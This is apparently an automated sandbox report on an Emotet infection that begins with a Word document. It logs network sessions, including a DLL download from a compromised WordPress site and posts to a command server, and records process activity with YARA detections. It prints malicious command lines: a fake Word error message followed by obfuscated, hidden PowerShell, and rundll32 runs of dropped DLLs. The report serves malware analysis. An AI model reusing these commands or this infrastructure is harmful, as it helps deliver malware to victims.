                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              4 | 192.168.2.22 | 49171 | 210.86.239.69 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 18:44:34.306168079 CET | 27 | OUT | GET /wordpress/CGMC/ HTTP/1.1
                                              Host: khanhhoahomnay.net
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:34.578701019 CET | 29 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 07 Jan 2021 17:44:34 GMT
                                              Content-Type: application/octet-stream
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60
                                              X-Powered-By: PHP/7.4.9
                                              Set-Cookie: 5ff74882c21e8=1610041474; expires=Thu, 07-Jan-2021 17:45:34 GMT; Max-Age=60; path=/
                                              Cache-Control: no-cache, must-revalidate
                                              Pragma: no-cache
                                              Last-Modified: Thu, 07 Jan 2021 17:44:34 GMT
                                              Expires: Thu, 07 Jan 2021 17:44:34 GMT
                                              Content-Disposition: attachment; filename="lVckIxaBMeiUca.dll"
                                              Content-Transfer-Encoding: binary
                                              Data Ascii: 1dd1MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              5 | 192.168.2.22 | 49172 | 5.2.136.90 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 18:44:47.033138990 CET | 228 | OUT | POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1
                                              DNT: 0
                                              Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/
                                              Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 5.2.136.90
                                              Content-Length: 8068
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Jan 7, 2021 18:44:47.754265070 CET | 238 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 07 Jan 2021 17:44:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Vary: Accept-Encoding


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:18:44:35
                                              Start date:07/01/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f780000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:18:44:37
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                                              Imagebase:0x4a7b0000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:18:44:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\msg.exe
                                              Wow64 process (32bit):false
                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                              Imagebase:0xff440000
                                              File size:26112 bytes
                                              MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:18:44:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:POwersheLL -w hidden -ENCOD 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
                                              Imagebase:0x13fda0000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Start time:18:44:46
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                              Imagebase:0xffaf0000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:18:44:46
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:18:44:47
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

General

Start time:18:44:47
Start date:07/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Imagebase:0x1e0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:18:44:48
Start date:07/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Imagebase:0x1e0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:18:44:49
Start date:07/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Imagebase:0x1e0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:18:44:49
Start date:07/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Imagebase:0x1e0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:18:44:50
Start date:07/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Imagebase:0x1e0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis
